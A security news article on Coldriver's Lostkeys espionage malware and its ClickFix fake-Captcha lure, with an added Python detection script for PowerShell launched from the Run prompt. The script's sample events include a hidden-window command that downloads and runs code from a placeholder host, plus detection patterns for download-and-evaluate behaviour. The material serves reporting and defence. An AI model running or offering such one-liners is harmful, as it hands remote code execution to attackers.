Malware Targets Western Officials, NGOs and Journalists
Russian cyber espionage hackers are using a new malware strain dubbed "Lostkeys" in a targeted espionage campaign aimed at Western officials, NGOs and journalists.
Google researchers attribute Lostkeys to the threat group Coldriver, also tracked as UNC4057, Star Blizzard and Callisto. The group, an operational unit within the Federal Security Service – the Russian successor to the KGB – is known for credential phishing attacks. Lostkeys is evidence that the group has improved its capabilities with a multi-stage infection chain designed to steal documents and harvest sensitive data.
Members of the threat group have been indicted in the U.S. and sanctioned in Europe, Britain and the U.S. A December 2023 warning published by the English-speaking countries that make up the Five Eyes intelligence alliance warned that the group is still active (see: UK and US Accuse Russian FSB of 'Hack and Leak' Operation).
Lostkeys marks a new tool in Coldriver's arsenal, representing an evolution from credential theft to full system infiltration, the Google Threat Intelligence Group said. The group uses the malware selectively, deploying it only against high-value targets, the report said.
Google observed Lostkeys activity in January, March and April, with indicators suggesting the malware may have first appeared as early as December 2023. Coldriver's typical targets include former and current Western government advisors, think tanks, NGOs, journalists and individuals with ties to Ukraine.
The Lostkeys attack chain begins with a fake Captcha page that tricks victims into pasting malicious PowerShell code into their Windows Run prompt, a technique dubbed "ClickFix" (see: ClickFix Attacks Increasingly Lead to Infostealer Infections).
This social engineering tactic circumvents traditional security controls and relies heavily on user compliance. Once executed, the PowerShell script pulls in successive payloads, each retrieved from the same command-and-control server but requiring unique identifiers per victim.
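The ClickFix entry point described above leaves a recognisable shape in endpoint telemetry: PowerShell started directly by the desktop shell (the parent of anything typed into the Run prompt is explorer.exe) with a command line that fetches and evaluates remote content or hides its own window. The following detection logic, written for this article and not taken from Google's report, scores constructed process-creation events against that shape; the field names, sample records and indicator patterns are assumptions for the example.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 / Security 4688
# fields. These are sample records written for this example, not telemetry from the
# campaign described above.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://example.invalid/s1 -UseBasicParsing)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Program Files\Git\git-bash.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
]

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Each pattern is a behaviour a pasted one-liner needs: fetch something from the
# network, evaluate what came back, or keep its window out of the user's sight.
INDICATORS = {
    "download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b", re.I),
    "eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def clickfix_indicators(event: dict) -> list[str]:
    """Return the indicator names matched by one event, or [] if it does not fit the pattern."""
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    # Only PowerShell launched by the desktop shell is in scope; a build script run
    # from a terminal (event 2 above) is deliberately not flagged.
    if parent != "explorer.exe" or image not in POWERSHELL_IMAGES:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, matched indicators) for every event worth an analyst's attention."""
    return [(i, hits) for i, e in enumerate(events) if (hits := clickfix_indicators(e))]


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)} :: {SAMPLE_EVENTS[i]['cmdline']}")
```

Commands typed into the Run prompt are also recorded under the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is a useful place to confirm a hit during incident response.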
The malware shows signs of sandbox evasion. Before advancing to the final stage, the second-stage code checks a hash of the machine's display resolution and halts execution if it matches a known virtual machine setup.
The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories, gathers system information and running processes and sends them back to the attacker. The script is decoded using a two-key substitution cipher, with each key pair unique to every infection chain.
Lostkeys is reminiscent of Spica, a previous malware strain used by Coldriver in 2024. While Spica was also designed for data theft, Lostkeys shows a refined architecture and more advanced delivery mechanisms.
Although some Lostkeys samples dating back to December 2023 mimicked the Maltego software package and used Portable Executable files instead of PowerShell, Google could not confirm whether these early versions were part of the same operation or repurposed malware used by another group.